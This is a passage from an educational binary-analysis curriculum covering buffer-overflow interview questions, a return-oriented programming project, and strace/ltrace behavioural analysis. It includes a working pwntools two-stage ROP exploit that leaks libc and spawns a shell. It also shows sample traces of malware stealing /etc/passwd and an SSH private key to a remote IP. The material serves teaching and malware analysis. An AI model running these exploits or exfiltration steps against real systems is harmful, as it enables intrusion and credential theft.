  2. โ€œWhy does the stack grow downward but arrays grow upward? How does this enable overflows?โ€ Expected: Historical architecture decision. Arrays grow toward higher addresses, so overflow overwrites later stack data (saved pointers, return addresses).

  3. โ€œExplain the difference between controlling RIP and actually executing your payload.โ€ Expected: Controlling RIP just redirects execution. Without executable stack (NX), you must point to existing code or use ROP. With exec stack, you can point to your shellcode.

  4. โ€œHow does ASLR prevent exploitation, and how do you defeat it?โ€ Expected: ASLR randomizes addresses, breaking hardcoded values. Defeat with info leaks (format strings, read overflows) or partial overwrites (only modify least significant bytes).

  5. โ€œWhatโ€™s a stack canary and how would you bypass it?โ€ Expected: Random value between buffer and return address. Bypass by: leaking canary value, overwriting without corrupting it, or using other vulnerabilities (format string).

  6. โ€œExplain ret2libc. Why is it used when NX is enabled?โ€ Expected: Return to existing library functions (like system()) instead of shellcode. Works because libc is executable and always loaded.

  7. โ€œYou have a 12-byte overflow but need 100+ bytes for shellcode. What are your options?โ€ Expected: (1) ROP chain, (2) stack pivot to larger buffer elsewhere, (3) two-stage exploit (small stub to read larger payload), (4) ret2libc (no shellcode needed).

  8. โ€œHow do you calculate the exact offset to the return address?โ€ Expected: Methods: (1) cyclic pattern + crash analysis, (2) GDB to examine stack, (3) source code analysis, (4) trial and error with increasing payloads.

  9. โ€œWhatโ€™s the purpose of NOP sled in shellcode exploits?โ€ Expected: Provides margin of error. If youโ€™re not sure of exact shellcode address, point anywhere in the NOPs (0x90) and execution slides to the shellcode.

  10. โ€œDescribe a real-world scenario where buffer overflow exploitation is still relevant today.โ€ Expected: IoT devices (often no ASLR/NX), legacy systems, kernel exploits, CTF competitions, security research/testing.

Books That Will Help

Topic Book Chapter/Section
Stack Layout & Function Calls โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 3.7 (Procedures, Stack Frames)
Buffer Overflow Fundamentals โ€œHacking: The Art of Exploitationโ€ Ch. 2.5 (Buffer Overflows)
Shellcode Writing โ€œHacking: The Art of Exploitationโ€ Ch. 5 (Shellcode)
Return Address Hijacking โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 3.7.3 (Data Transfer)
Security Mitigations (NX, ASLR, Canaries) โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 3.10.3 (Stack Corruption Detection)
Code-Reuse Attacks (ret2libc) โ€œPractical Binary Analysisโ€ Ch. 10.2 (Code-Reuse Attacks)
ASLR and Randomization โ€œPractical Binary Analysisโ€ Ch. 10.3 (Randomization Defenses)
Low-Level Memory Layout โ€œLow-Level Programmingโ€ Ch. 8 (Memory Management)
Exploitation Techniques โ€œThe Shellcoderโ€™s Handbookโ€ Ch. 4-5 (Stack Overflows)
Assembly for Exploitation โ€œLow-Level Programmingโ€ Ch. 3-4 (Assembly Language)
Debugging with GDB โ€œHacking: The Art of Exploitationโ€ Ch. 2 (Programming, Debugging)
Format String Exploits โ€œHacking: The Art of Exploitationโ€ Ch. 3 (Exploitation)
Heap Exploitation Intro โ€œThe Shellcoderโ€™s Handbookโ€ Ch. 7 (Heap Overflows)
Pwntools Usage Official Pwntools Docs docs.pwntools.com
Modern Exploitation โ€œA Guide to Kernel Exploitationโ€ Ch. 1-2 (Background, Stack Overflows)

Project 8: Return-Oriented Programming (ROP)

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Python (pwntools)
  • Alternative Programming Languages: Assembly understanding
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 1. The โ€œResume Goldโ€
  • Difficulty: Level 4: Expert
  • Knowledge Area: Advanced Exploitation / Code Reuse
  • Software or Tool: ROPgadget, ropper, pwntools
  • Main Book: โ€œThe Shellcoderโ€™s Handbookโ€

What youโ€™ll build: Complex ROP chains that bypass NX protection by chaining together code snippets already in the binary.

Why it teaches binary analysis: ROP is the foundation of modern exploitation. It demonstrates deep understanding of calling conventions and code reuse.

Core challenges youโ€™ll face:

  • Finding gadgets โ†’ maps to instruction sequences ending in ret
  • Chaining gadgets โ†’ maps to building functionality from fragments
  • Setting up arguments โ†’ maps to calling conventions (rdi, rsi, rdx)
  • Calling system() โ†’ maps to executing /bin/sh

Resources for key challenges:

Key Concepts:

  • Gadget Types: โ€œThe Shellcoderโ€™s Handbookโ€ Ch. 9
  • x64 Calling Convention: System V ABI
  • Stack Pivoting: ROP Emporium tutorials

Difficulty: Expert Time estimate: 2-3 weeks Prerequisites: Project 7 (Buffer Overflow)

Real world outcome:

from pwn import *

elf = ELF('./target')
libc = ELF('./libc.so.6')
rop = ROP(elf)

# Find gadgets
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
ret = rop.find_gadget(['ret'])[0]

# Leak libc address
payload = flat(
    b'A' * offset,
    pop_rdi,
    elf.got['puts'],    # Argument: puts@GOT
    elf.plt['puts'],    # Call puts to leak
    elf.symbols['main'] # Return to main for second stage
)

p.sendline(payload)
leaked = u64(p.recv(6).ljust(8, b'\x00'))
libc.address = leaked - libc.symbols['puts']

# Second stage: call system("/bin/sh")
bin_sh = next(libc.search(b'/bin/sh'))
system = libc.symbols['system']

payload2 = flat(
    b'A' * offset,
    ret,                # Stack alignment
    pop_rdi,
    bin_sh,
    system
)

p.sendline(payload2)
p.interactive()

Implementation Hints:

Gadget hunting:

$ ROPgadget --binary ./target | grep "pop rdi"
0x00401233 : pop rdi ; ret
$ ROPgadget --binary ./target | grep "pop rsi"
0x00401231 : pop rsi ; pop r15 ; ret

Common ROP patterns:

  1. Leak libc: Call puts(GOT_entry) to leak address
  2. Calculate libc base: leaked_addr - offset = libc_base
  3. Find /bin/sh: Search libc for โ€œ/bin/shโ€ string
  4. Call system: pop rdi; ret + โ€œ/bin/shโ€ addr + system addr

Stack alignment:

  • x64 requires 16-byte stack alignment before call
  • Add a ret gadget if system() crashes

Learning milestones:

  1. Find gadgets โ†’ Use ROPgadget or ropper
  2. Chain simple ROP โ†’ Control function arguments
  3. Leak libc โ†’ Bypass ASLR
  4. Get shell โ†’ Complete exploitation chain

The Core Question Youโ€™re Answering

How do you construct arbitrary computational logic from tiny fragments of existing code when direct code execution is impossible, and how do you chain these fragments to bypass the most sophisticated memory protection mechanisms?

This project represents the pinnacle of code-reuse attacks. Youโ€™ll learn to โ€œprogramโ€ using only code snippets (gadgets) that already exist in the binary, treating the stack as your instruction stream and gadgets as your instruction set.

Concepts You Must Understand First

1. What is a Gadget?

A gadget is a short instruction sequence ending in ret. Each gadget performs a small operation (like pop rdi; ret) and returns control, allowing you to chain gadgets together.

Gadget anatomy:
   0x401234: pop rdi          โ† Useful operation
   0x401235: ret              โ† Returns to next gadget

Stack layout during ROP:
   +------------------+
   | Gadget 1 addr    | โ† Return here first
   | Data for gadget1 |
   | Gadget 2 addr    | โ† Then return here
   | Data for gadget2 |
   | Gadget 3 addr    | โ† Then return here
   | ...              |
   +------------------+

Guiding Questions:

  • Why must gadgets end in ret?
  • How does the ret instruction enable chaining?
  • What makes a gadget โ€œusefulโ€ vs โ€œjunkโ€?

Book Reference: โ€œPractical Binary Analysisโ€ Ch. 10.2 - Code-Reuse Attacks

2. x64 Calling Convention (System V ABI)

To call functions via ROP, you must understand argument passing: RDI (1st arg), RSI (2nd), RDX (3rd), RCX (4th), R8 (5th), R9 (6th).

Guiding Questions:

  • How do you call `system(โ€œ/bin/shโ€)` with ROP? (Hint: set RDI)
  • Whatโ€™s the difference between x64 and x86 calling conventions?
  • Why do you need `pop rdi; ret` gadgets specifically?

Book Reference: โ€œLow-Level Programmingโ€ Ch. 9 - Calling Conventions

3. GOT (Global Offset Table) and PLT (Procedure Linkage Table)

The GOT stores addresses of library functions (resolved at runtime). The PLT provides stubs to call them. Leaking GOT entries defeats ASLR.

Program calls printf():
   call printf@PLT  โ† PLT stub

PLT stub:
   jmp [printf@GOT]  โ† Jump to address in GOT

GOT entry (after first call):
   0x7ffff7a62800  โ† Actual printf address in libc

Guiding Questions:

  • Why does the GOT contain real addresses but the PLT doesnโ€™t?
  • How do you leak a GOT entry to find libc base?
  • Whatโ€™s โ€œlazy bindingโ€ and why does it matter for exploitation?

Book Reference: โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 7.12 - Position-Independent Code

4. Information Leaks for ASLR Bypass

Since ASLR randomizes library addresses, you must leak an address first. Common technique: call `puts(GOT_entry)` to print the address.

Guiding Questions:

  • Why leak puts or printf addresses specifically?
  • How do you calculate libc base from a leaked function address?
  • Whatโ€™s a โ€œtwo-stageโ€ exploit and why is it necessary?

Book Reference: โ€œPractical Binary Analysisโ€ Ch. 10.3 - Randomization-Based Defenses

5. Stack Alignment Requirements

x64 requires the stack pointer (RSP) to be 16-byte aligned before executing a `call` instruction. Misalignment causes segfaults.

Guiding Questions:

  • Why does `system()` crash when called from ROP but work from ret2libc?
  • How does adding a `ret` gadget fix alignment?
  • What happens when RSP is misaligned (e.g., RSP % 16 != 0)?

Book Reference: System V ABI x86-64 specification

6. Gadget Types and Their Uses

Different gadget types serve different purposes:

  • Argument gadgets: `pop rdi; ret` (set function arguments)
  • Arithmetic gadgets: `add rax, rbx; ret` (compute values)
  • Memory gadgets: `mov [rax], rbx; ret` (write memory)
  • Control gadgets: `jmp rax` (conditional logic)

Guiding Questions:

  • Which gadget types are essential for basic exploitation?
  • How do you handle functions requiring 3+ arguments?
  • What do you do when the perfect gadget doesnโ€™t exist?

Book Reference: โ€œThe Shellcoderโ€™s Handbookโ€ Ch. 9 - Return-Oriented Programming

7. Libc Database and Version Fingerprinting

Different libc versions have functions at different offsets. To find the right libc, you fingerprint it by leaking multiple addresses.

Guiding Questions:

  • Why canโ€™t you just hardcode libc offsets?
  • How does libc-database.com help find the right version?
  • What happens if you use the wrong libc version in your exploit?

Book Reference: CTF writeups and online resources (libc.blukat.me, libc.rip)

8. Advanced ROP Techniques

Beyond basic ROP:

  • Stack pivoting: Move RSP to a controlled buffer
  • SROP (Sigreturn ROP): Use `sigreturn` to set all registers
  • JOP (Jump-Oriented Programming): Use `jmp` instead of `ret`
  • ret2csu: Use `__libc_csu_init` for arbitrary gadgets

Guiding Questions:

  • When do you need stack pivoting?
  • What makes SROP powerful (hint: it sets ALL registers)?
  • Why is `__libc_csu_init` present in every dynamically linked binary?

Book Reference: โ€œPractical Binary Analysisโ€ Ch. 10.2.3 - Advanced ROP

Questions to Guide Your Design

  1. How do you find gadgets when automated tools like ROPgadget fail or miss useful sequences? Consider manual searching, analyzing compiler-generated code, and understanding common instruction patterns.

  2. Whatโ€™s your strategy when you need a gadget that doesnโ€™t exist in the binary? Think about combining multiple gadgets, using library functions, or finding equivalent sequences.

  3. How would you structure a ROP chain that calls multiple functions in sequence (e.g., `mprotect()` then `shellcode()`)? Consider stack layout, argument setup, and return addresses.

  4. When you leak a libc address, how do you reliably identify which libc version is running? Think about fingerprinting multiple functions, libc databases, and offset patterns.

  5. How do you debug a ROP chain that crashes midway through execution? Consider GDB breakpoints on gadgets, stack inspection, and pwntools logging.

  6. What approach works when ASLR is enabled but you canโ€™t find a good leak primitive? Think about partial overwrites, brute force, or other information disclosure vulnerabilities.

  7. How would you automate ROP chain generation for repeated exploitation? Consider pwntoolsโ€™ ROP class, custom scripts, and chain templates.

  8. When exploiting a remote service, how do you handle the lack of direct debugging access? Think about local replication, binary analysis, and remote crash behavior.

Thinking Exercise

Before building complex ROP chains, complete these exercises:

  1. Manual Gadget Discovery: Take a simple binary and manually search for gadgets using objdump.

  2. Stack Layout Visualization: Draw the complete stack layout for a ROP chain step by step.

  3. Libc Leak Practice: Practice calculating libc base from leaked GOT entries.

  4. Building a Simple ROP Chain: Write a complete ROP chain to call write(1, buffer, 100).

The Interview Questions Theyโ€™ll Ask

  1. โ€œExplain ROP at a high level. Why is it called โ€˜return-orientedโ€™?โ€ Expected: Uses `ret` instruction to chain code snippets (gadgets). Each gadget ends with `ret`, which loads the next gadgetโ€™s address from the stack.

  2. โ€œHow do you call system(โ€˜/bin/shโ€™) using ROP on x64?โ€ Expected: Need `pop rdi; ret` to set RDI = โ€œ/bin/shโ€ address, then call `system@plt` or leak libc and call libcโ€™s `system`.

  3. โ€œWhatโ€™s the difference between a gadget and regular shellcode?โ€ Expected: Shellcode is custom assembly you inject. Gadgets are existing code fragments you reuse. ROP works when stack is non-executable (NX).

  4. โ€œWhy do you need to leak libc addresses? Canโ€™t you just use hardcoded offsets?โ€ Expected: ASLR randomizes libc base address on each execution. Must leak a known functionโ€™s address to calculate base.

  5. โ€œWalk me through a two-stage ROP exploit that defeats ASLR.โ€ Expected: Stage 1: Leak libc address (puts(GOT_entry)), return to main. Stage 2: Use leaked address to calculate libc base, call system(โ€œ/bin/shโ€).

  6. โ€œWhatโ€™s stack alignment and why does system() crash in ROP but not normally?โ€ Expected: x64 requires RSP % 16 == 0 before `call`. Normal code maintains this, but ROP might not. Fix: add `ret` gadget for alignment.

  7. โ€œHow do you find gadgets when ROPgadget doesnโ€™t find what you need?โ€ Expected: Manual searching with objdump, looking for unintended gadgets (instructions misaligned), using ret2csu or other universal gadgets.

  8. โ€œExplain the GOT and PLT. How do you leak a GOT entry?โ€ Expected: PLT stubs call functions via GOT. GOT contains actual addresses (after lazy binding). Leak: call puts(GOT_entry) to print the address.

  9. โ€œWhatโ€™s ret2csu and why is it useful?โ€ Expected: `__libc_csu_init` function contains gadgets to control RDI, RSI, RDX. Present in all dynamically linked binaries. Provides universal gadgets.

  10. โ€œDescribe a scenario where ROP is necessary vs simpler exploitation techniques.โ€ Expected: NX prevents shellcode execution. Stack canaries prevent simple overwrites. ASLR prevents hardcoded addresses. ROP bypasses all three.

Books That Will Help

Topic Book Chapter/Section
ROP Fundamentals โ€œPractical Binary Analysisโ€ Ch. 10.2 (Code-Reuse Attacks)
Advanced ROP Techniques โ€œPractical Binary Analysisโ€ Ch. 10.2.3 (Advanced ROP, SROP)
Calling Conventions (x64) โ€œLow-Level Programmingโ€ Ch. 9 (Calling Conventions)
GOT/PLT Mechanism โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 7.12 (Position-Independent Code)
ROP Theory โ€œThe Shellcoderโ€™s Handbookโ€ Ch. 9 (Return-Oriented Programming)
Stack Alignment System V ABI x86-64 Specification Section 3.2.2 (The Stack Frame)
ASLR and Bypasses โ€œPractical Binary Analysisโ€ Ch. 10.3 (Randomization Defenses)
Dynamic Linking โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 7 (Linking)
Exploitation Techniques โ€œHacking: The Art of Exploitationโ€ Ch. 5 (Shellcode)
Pwntools for ROP Official Pwntools Docs docs.pwntools.com/rop.html
Assembly (x64) โ€œLow-Level Programmingโ€ Ch. 3-4 (Assembly Language)
ret2csu Technique CTF Writeups Multiple sources online
Gadget Hunting โ€œThe Shellcoderโ€™s Handbookโ€ Ch. 9.2 (Finding Gadgets)
Stack Pivoting โ€œPractical Binary Analysisโ€ Ch. 10.2.3 (Advanced Techniques)
Sigreturn-Oriented Programming Research Papers โ€œFraming Signalsโ€”A Return to Portable Shellcodeโ€

Project 9: Dynamic Analysis with strace/ltrace

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Command line tools
  • Alternative Programming Languages: Python for automation
  • Coolness Level: Level 2: Practical but Forgettable
  • Business Potential: 1. The โ€œResume Goldโ€
  • Difficulty: Level 1: Beginner
  • Knowledge Area: Dynamic Analysis / System Calls
  • Software or Tool: strace, ltrace, Linux
  • Main Book: โ€œThe Linux Programming Interfaceโ€ by Michael Kerrisk

What youโ€™ll build: Analyze unknown binaries using only system call and library call tracing, without disassembly.

Why it teaches binary analysis: Sometimes you donโ€™t need disassembly. Seeing what files a program opens and what APIs it calls reveals a lot.

Core challenges youโ€™ll face:

  • Understanding syscall output โ†’ maps to knowing what each syscall does
  • Filtering noise โ†’ maps to focusing on interesting calls
  • Following child processes โ†’ maps to fork/exec tracing
  • Interpreting library calls โ†’ maps to understanding libc functions

Resources for key challenges:

Key Concepts:

  • System Calls: โ€œThe Linux Programming Interfaceโ€ Ch. 3
  • Library Calls: ltrace man page
  • Process Tracing: strace man page

Difficulty: Beginner Time estimate: 3-5 days Prerequisites: Basic Linux command line

Real world outcome:

$ strace -f ./suspicious_binary 2>&1 | head -50
execve("./suspicious_binary", ...) = 0
openat(AT_FDCWD, "/etc/passwd", O_RDONLY) = 3   # Reading password file!
read(3, "root:x:0:0:...", 4096) = 2847
close(3)
socket(AF_INET, SOCK_STREAM, 0) = 4              # Opening socket!
connect(4, {sa_family=AF_INET, sin_port=htons(1337),
        sin_addr=inet_addr("10.0.0.1")}, 16) = 0  # Connecting to C2!
write(4, "root:x:0:0:...", 2847) = 2847          # Exfiltrating data!

$ ltrace ./crackme
__libc_start_main(...)
puts("Enter password: ")
fgets("test\n", 100, stdin)
strlen("test\n") = 5
strcmp("test", "s3cr3t_p4ss") = -1               # Password revealed!
puts("Wrong!")

Implementation Hints:

Useful strace options:

strace -f          # Follow child processes
strace -e open     # Only trace open() calls
strace -e file     # All file-related calls
strace -e network  # All network-related calls
strace -s 1000     # Show 1000 chars of strings
strace -o log.txt  # Output to file
strace -p PID      # Attach to running process

Useful ltrace options:

ltrace -e strcmp   # Only trace strcmp
ltrace -e '*'      # All library calls
ltrace -C          # Demangle C++ names
ltrace -n 2        # Show 2 levels of nesting

Analysis workflow:

  1. Run with strace to see syscalls
  2. Run with ltrace to see library calls
  3. Look for interesting patterns:
    • File operations (what does it read/write?)
    • Network operations (where does it connect?)
    • String comparisons (password checks?)

Learning milestones:

  1. Trace basic program โ†’ Understand output format
  2. Find password checks โ†’ strcmp/memcmp in ltrace
  3. Trace network activity โ†’ socket/connect/send
  4. Analyze malware behavior โ†’ Without disassembly

The Core Question Youโ€™re Answering

โ€œCan we understand what a program does by watching it interact with the operating system, without ever looking at its source code or disassembly?โ€

This project explores the power of behavioral analysis through system call and library call tracing. Youโ€™ll learn that sometimes the most revealing information about a program comes not from what it is, but from what it doesโ€”every file it touches, every network connection it makes, every string it compares.

Concepts You Must Understand First

  1. System Calls (syscalls)
    • The boundary between user space and kernel spaceโ€”how programs request services from the OS
    • Every file operation, network connection, or process creation goes through syscalls
    • Understanding syscalls reveals a programโ€™s interactions with the outside world

    Guiding Questions:

    • Why canโ€™t user-space programs directly access hardware or files?
    • Whatโ€™s the difference between a library call like fopen() and a syscall like open()?
    • How does the kernel validate syscall arguments to prevent malicious programs from harming the system?

    Book References:

    • โ€œThe Linux Programming Interfaceโ€ by Michael Kerrisk - Chapter 3: System Programming Concepts
    • โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ (CS:APP) - Chapter 8.4: Process Control (syscall mechanics)
    • โ€œLow-Level Programmingโ€ by Igor Zhirkov - Chapter 2.5: System Calls
  2. Process Memory Layout
    • How programs are loaded into memory (text, data, stack, heap segments)
    • Understanding memory addresses in strace output (e.g., mmap() calls)
    • Why programs request memory from the OS via brk() or mmap()

    Guiding Questions:

    • What does it mean when strace shows brk(0x5555555a2000) = 0x5555555a2000?
    • Why do programs use mmap() instead of just allocating with malloc()?
    • How can you tell from syscall traces whether a program is leaking memory?

    Book References:

    • โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ - Chapter 9: Virtual Memory
    • โ€œThe Linux Programming Interfaceโ€ - Chapter 6: Processes (memory layout)
    • โ€œPractical Binary Analysisโ€ by Dennis Andriesse - Chapter 5.2: Loading and Dynamic Linking
  3. Library Calls vs. System Calls
    • Library calls (ltrace) are user-space wrappers around syscalls
    • One fread() might generate multiple read() syscalls due to buffering
    • Understanding the libc abstraction layer

    Guiding Questions:

    • Why does printf("hello") not immediately call write() syscall?
    • How does libcโ€™s buffering affect what you see in strace vs. ltrace?
    • When would you use ltrace instead of strace (and vice versa)?

    Book References:

    • โ€œThe Linux Programming Interfaceโ€ - Chapter 13: File I/O Buffering
    • โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ - Chapter 10: System-Level I/O
  4. File Descriptors and File Operations
    • Understanding fd numbers: 0=stdin, 1=stdout, 2=stderr, 3+=open files
    • How openat(), read(), write(), close() work together
    • Interpreting flags like O_RDONLY, O_WRONLY, O_CREAT

    Guiding Questions:

    • What does openat(AT_FDCWD, "/etc/passwd", O_RDONLY) = 3 tell you?
    • How can you track which fd corresponds to which file in a long trace?
    • Whatโ€™s suspicious about a program opening /dev/urandom or /etc/shadow?

    Book References:

    • โ€œThe Linux Programming Interfaceโ€ - Chapter 4: File I/O: The Universal I/O Model
    • โ€œThe Linux Programming Interfaceโ€ - Chapter 18: Directories and Links
  5. Process Lifecycle (fork/exec/wait)
    • How processes create children with fork(), replace themselves with execve()
    • Following child processes with strace -f
    • Understanding return values: fork() returns twice (parent gets child PID, child gets 0)

    Guiding Questions:

    • Why does fork() return different values in parent and child?
    • What happens to file descriptors when a process calls execve()?
    • How would you trace a shell script that spawns multiple child processes?

    Book References:

    • โ€œThe Linux Programming Interfaceโ€ - Chapter 24: Process Creation
    • โ€œThe Linux Programming Interfaceโ€ - Chapter 27: Program Execution
    • โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ - Chapter 8.4: Process Control
  6. Network Socket API
    • Understanding socket(), connect(), bind(), listen(), accept(), send(), recv()
    • Reading sockaddr structures to extract IP addresses and ports
    • Identifying client vs. server behavior from syscall patterns

    Guiding Questions:

    • What syscall sequence indicates a program is acting as a server?
    • How do you extract the destination IP and port from a connect() call?
    • Whatโ€™s the difference between AF_INET (IPv4) and AF_INET6 (IPv6)?

    Book References:

    • โ€œThe Linux Programming Interfaceโ€ - Chapter 56-61: Sockets and Network Programming
    • โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ - Chapter 11: Network Programming
  7. Signal Handling
    • How programs respond to events (Ctrl+C sends SIGINT, segfault triggers SIGSEGV)
    • Seeing rt_sigaction() and rt_sigprocmask() in traces
    • Understanding signal delivery and handler installation

    Guiding Questions:

    • What does it mean when a program installs a handler for SIGSEGV?
    • Why might malware install signal handlers to detect debugging?
    • How can you tell if a program is ignoring SIGTERM?

    Book References:

    • โ€œThe Linux Programming Interfaceโ€ - Chapter 20-22: Signals
    • โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ - Chapter 8.5: Signals
  8. Dynamic Linking and Shared Libraries
    • How programs load .so files at runtime
    • Understanding LD_PRELOAD and library injection
    • Seeing dlopen(), dlsym() for runtime loading

    Guiding Questions:

    • Whatโ€™s happening when you see multiple openat() calls to .so files?
    • How could an attacker use LD_PRELOAD maliciously?
    • Why do some programs use dlopen() instead of linking at compile time?

    Book References:

    • โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ - Chapter 7: Linking
    • โ€œPractical Binary Analysisโ€ - Chapter 5: Loading and Dynamic Linking
    • โ€œThe Linux Programming Interfaceโ€ - Chapter 41-42: Shared Libraries

Questions to Guide Your Design

  1. How can you automatically filter out โ€œboringโ€ syscalls (like mmap() for library loading) to focus on interesting behavior?
    • Consider writing a Python script that parses strace output and highlights file/network operations
    • What heuristics distinguish initialization syscalls from runtime behavior?
  2. How would you detect anti-debugging or anti-tracing techniques in a program?
    • Programs can check if theyโ€™re being traced using ptrace(PTRACE_TRACEME)
    • What syscall patterns indicate a program is checking for analysis tools?
  3. How can you reconstruct a programโ€™s command-line parsing logic from ltrace output alone?
    • Watch for strcmp(), strncmp(), getopt() calls
    • Can you build a decision tree of program behavior based on arguments?
  4. Whatโ€™s the difference between tracing a statically-linked binary vs. a dynamically-linked binary?
    • Static binaries make syscalls directly; dynamic binaries go through libc
    • How does this affect what you see in strace vs. ltrace?
  5. How would you trace a multi-threaded program with strace?
    • Use strace -f to follow threads created by clone()
    • How do you distinguish thread creation from process creation in the output?
  6. Can you identify a programโ€™s cryptographic operations from syscall traces?
    • Look for reads from /dev/urandom (entropy source)
    • Large writes to network sockets might indicate encrypted communication
  7. How would you use strace to diagnose why a program is slow or hanging?
    • Look for blocking syscalls: read() on network sockets, wait() on child processes
    • Use strace -T to show time spent in each syscall
  8. How can you determine if a binary is packed or obfuscated by examining its syscalls?
    • Self-modifying code might use mprotect() to change memory permissions
    • Packed binaries often unpack themselves in memory before executing

Thinking Exercise

Exercise 1: Manual Syscall Trace Analysis

Before running any tools, examine this strace output from an unknown binary:

execve("./mystery", ["./mystery"], 0x7ffc...) = 0
openat(AT_FDCWD, "/home/user/.ssh/id_rsa", O_RDONLY) = 3
read(3, "-----BEGIN RSA PRIVATE KEY-----
"..., 4096) = 1679
close(3) = 0
socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(443),
        sin_addr=inet_addr("203.0.113.45")}, 16) = 0
write(3, "-----BEGIN RSA PRIVATE KEY-----
"..., 1679) = 1679
close(3) = 0
unlink("/home/user/.ssh/id_rsa") = 0

Questions to answer:

  1. What is this program doing? (Be specific about each step)
  2. What type of malware behavior does this exhibit?
  3. What Indicators of Compromise (IOCs) can you extract?
  4. How would you write a YARA rule to detect similar behavior?
  5. What syscall would you set a breakpoint on if debugging this?

Exercise 2: ltrace Password Extraction

Given this ltrace output from a crackme:

__libc_start_main(...)
puts("Enter password: ")
fgets("my_guess
", 100, 0x7f...)
strlen("my_guess
") = 9
strcmp("my_guess", "sup3r_s3cr3t") = -1
puts("Wrong password!")

Tasks:

  1. Extract the correct password (even though we guessed wrong)
  2. Explain why ltrace is more useful than strace for this crackme
  3. What would strace show instead? (Describe the syscalls)
  4. How could the developer prevent this ltrace attack?

Exercise 3: Network Protocol Reconstruction

Analyze this strace excerpt and reconstruct the network protocol:

socket(AF_INET, SOCK_STREAM, 0) = 3
connect(3, {sin_addr=inet_addr("10.0.0.5"), sin_port=htons(9999)}, 16) = 0
write(3, "HELLO
", 6) = 6
read(3, "OK
", 4096) = 3
write(3, "GET /data
", 10) = 10
read(3, "DATA:12345
", 4096) = 11
write(3, "BYE
", 4) = 4
close(3) = 0

Questions:

  1. Is this a text-based or binary protocol?
  2. Whatโ€™s the message flow? (Draw a sequence diagram)
  3. How would you fuzz this protocol?
  4. Whatโ€™s missing from this trace that would help with analysis?

The Interview Questions Theyโ€™ll Ask

  1. โ€œYouโ€™re analyzing a suspicious binary. It produces no output, but you suspect itโ€™s exfiltrating data. How would you use strace to confirm this?โ€
    • Expected Answer: Use strace -e network to trace network syscalls. Look for socket(), connect(), send(), or write() to network fds. Check destination IPs. Use strace -s 1000 to see full data buffers. Alternatively, combine with Wireshark for full packet capture.
  2. โ€œExplain the difference between strace and ltrace. When would you use each?โ€
    • Expected Answer: strace traces system calls (kernel boundary), ltrace traces library calls (user-space functions). Use strace for file/network I/O, process management. Use ltrace for string operations (strcmp), crypto functions (MD5), library-level logic. Sometimes you need both: strace shows what happens, ltrace shows how the program logic works.
  3. โ€œA program is reading from /dev/urandom. What does this tell you, and what should you investigate next?โ€
    • Expected Answer: Itโ€™s generating random numbers, likely for cryptography or nonce generation. Check how much entropy it reads. Look for subsequent crypto operations (OpenSSL functions in ltrace, or network writes that might be encrypted data). Could be legitimate (TLS) or malicious (ransomware generating encryption keys).
  4. โ€œHow does strace work under the hood? What syscall does strace itself use?โ€
    • Expected Answer: strace uses ptrace() syscall to attach to a process and intercept its syscalls. When the traced process makes a syscall, the kernel stops it and notifies strace. This is the same mechanism debuggers use. This is why anti-debugging malware often checks for ptrace() or looks for parent processes named โ€œstraceโ€.
  5. โ€œYou see hundreds of mmap() and mprotect() calls in a trace. What might this indicate?โ€
    • Expected Answer: Could be normal (loading shared libraries, allocating memory). Or could indicate packing/obfuscationโ€”malware unpacking itself, self-modifying code, or JIT compilation. Check if mprotect() is changing memory to executable (PROT_EXEC). Packed malware often mmap()s space, writes unpacked code, then mprotect()s it to RWX.
  6. โ€œHow would you trace a program that uses fork() to create multiple child processes?โ€
    • Expected Answer: Use strace -f (follow forks). Output can be confusing with interleaved processes. Use -ff -o trace.log to write each process to a separate file (trace.log.PID). Then analyze each childโ€™s behavior independently. Watch for clone() (threads) vs. fork() (processes).
  7. โ€œA program calls unlink() on its own executable. Whatโ€™s likely happening?โ€
    • Expected Answer: Itโ€™s deleting itself, common in malware to hide tracks. On Linux, an open file can be deletedโ€”it stays on disk until the last fd is closed. The program continues running from memory. This is an anti-forensics technique. Youโ€™d need to dump the process memory to recover the binary.
  8. โ€œYou trace a crackme and see strcmp("my_input", "secretpass") = -1. Is this always the password?โ€
    • Expected Answer: Usually yes, but not always! Some crackmes use tricks: comparing hashes instead of plaintext, doing multiple checks (must pass all), or using timing attacks. Also, smart crackmes might use memcmp() (binary compare) instead of strcmp() to avoid ltrace. Or they might implement custom comparison in assembly to avoid library calls entirely.
  9. โ€œHow can a program detect that itโ€™s being traced by strace, and how would you bypass this detection?โ€
    • Expected Answer: Programs can call ptrace(PTRACE_TRACEME) which fails if already traced (strace uses ptrace). They can check /proc/self/status for โ€œTracerPidโ€. They can use timing attacks (strace is slow). Bypasses: Use kernel modules that hook syscalls without ptrace. Use emulation (QEMU user-mode). Patch the binary to remove checks. Use LD_PRELOAD to fake ptrace return values.
  10. โ€œYou need to analyze a binary but itโ€™s statically linked. How does this affect your strace/ltrace strategy?โ€
    • Expected Answer: ltrace is uselessโ€”no library calls to intercept. strace still works (syscalls are unavoidable). Youโ€™ll see raw syscalls instead of nice library wrappers. For string operations, youโ€™ll need to disassemble or use dynamic instrumentation (Frida, DynamoRIO) to hook internal functions.

Books That Will Help

Topic Book Chapter/Section Why It Matters
System Call Fundamentals โ€œThe Linux Programming Interfaceโ€ by Michael Kerrisk Ch. 3: System Programming Concepts Complete reference for every syscall youโ€™ll see in traces
System Call Mechanics โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ by Bryant & Oโ€™Hallaron Ch. 8.1: Exceptions; Ch. 8.4: Process Control Understand how syscalls transition from user to kernel mode
